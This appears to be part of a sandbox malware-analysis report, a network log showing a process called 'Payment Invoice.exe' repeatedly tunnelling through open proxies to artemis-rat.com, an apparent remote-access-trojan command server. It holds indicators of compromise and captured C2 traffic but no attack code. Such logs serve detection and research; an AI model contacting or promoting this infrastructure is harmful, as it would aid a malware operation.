                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                201192.168.2.450619104.25.87.42807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.979967117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.135085106 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                202192.168.2.450620104.21.223.181807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.981481075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.136287928 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                203192.168.2.449778194.4.50.91123347076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.981777906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                204192.168.2.45056823.95.209.142156737076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.984349012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                205192.168.2.45054372.10.160.9251237076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.985934973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                206192.168.2.450529159.203.61.16931287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.987176895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.592350006 CET28INHTTP/1.1 400 Bad Request


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                207192.168.2.450641104.16.109.207807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.989458084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.143963099 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                208192.168.2.45049772.195.34.60273917076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.990551949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                209192.168.2.45039595.57.216.11880807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.021507025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.807904959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.283158064 CET202INHTTP/1.0 404 Not Found
                                                                Content-Length: 717
                                                                Content-Type: text/html
                                                                Date: Sat, 24 Apr 1971 17:35:48 GMT
                                                                Expires: Sat, 24 Apr 1971 17:35:48 GMT
                                                                Server: Mikrotik HttpProxy
                                                                Proxy-Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                210192.168.2.450381202.40.181.220312477076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.022059917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                211192.168.2.450442120.79.101.088887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.022066116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.379112005 CET767INHTTP/1.1 403 Forbidden
                                                                Server: Beaver
                                                                Cache-Control: no-cache
                                                                Content-Type: text/html
                                                                Content-Length: 635
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                212192.168.2.4505973.212.148.19931287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.022170067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.239435911 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                213192.168.2.450287222.138.76.690027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.022197008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.979792118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.495471001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.995595932 CET311INHTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                214192.168.2.45059072.10.164.17855297076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.022511005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.977961063 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                215192.168.2.45056572.10.160.90243977076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.022891998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.879522085 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                216192.168.2.450687104.16.108.42807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.022943020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.177035093 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                217192.168.2.45057323.152.40.1431287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.022993088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                218192.168.2.45043136.92.193.189807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.024842024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.792277098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.746927977 CET818INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Server: Apache
                                                                Vary: accept-language,accept-charset
                                                                Accept-Ranges: bytes
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Language: en
                                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 53 65 72 76 65 72 20 65 72 72 6f 72 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 69 6e 66 6f 40 72 73 68 62 2d 6c 61 6d 70 75 6e 67 2e 63 6f 2e 69 64 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 65 72 72 6f 72 21
                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Server error!</title><link rev="made" href="mailto:info@rshb-lampung.co.id" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/*...*/--></style></head><body><h1>Server error!
                                                                Mar 11, 2024 16:15:20.747065067 CET461INData Raw: 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 0d 0a 0d 0a 20 20 20 20 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 61 6e 64 20 77 61 73 20 0d 0a 20 20 20 20 75
                                                                Data Ascii: </h1><p> The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there was an error in a CGI script. </p><p>If you think this is a server err


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                219192.168.2.45049818.135.211.18231287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.030368090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.324230909 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                220192.168.2.4505113.127.62.252807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.057591915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.361418962 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0
                                                                Mar 11, 2024 16:15:15.362456083 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 02 17 76 ac 56 dc 88 aa a8 a0 78 bb ba f7 c2 00 75 67 61 64 fc a2 36 40 29 d3 c9 b0 d0 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                Data Ascii: e vVxugad6@)*,+0/$#('=<5/Uartemis-rat.com#
                                                                Mar 11, 2024 16:15:15.666578054 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 fe 1e 61 d2 bc 70 3a c5 56 88 b0 b4 4f ef a2 5d e2 b7 ad fe e1 6f 81 1e 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                Data Ascii: =9ap:VO]oDOWNGRD0000*H010Uartemis-rat.com0240311150936Z260311150936Z010Uartemis-rat.com0"0*H0aB,7D
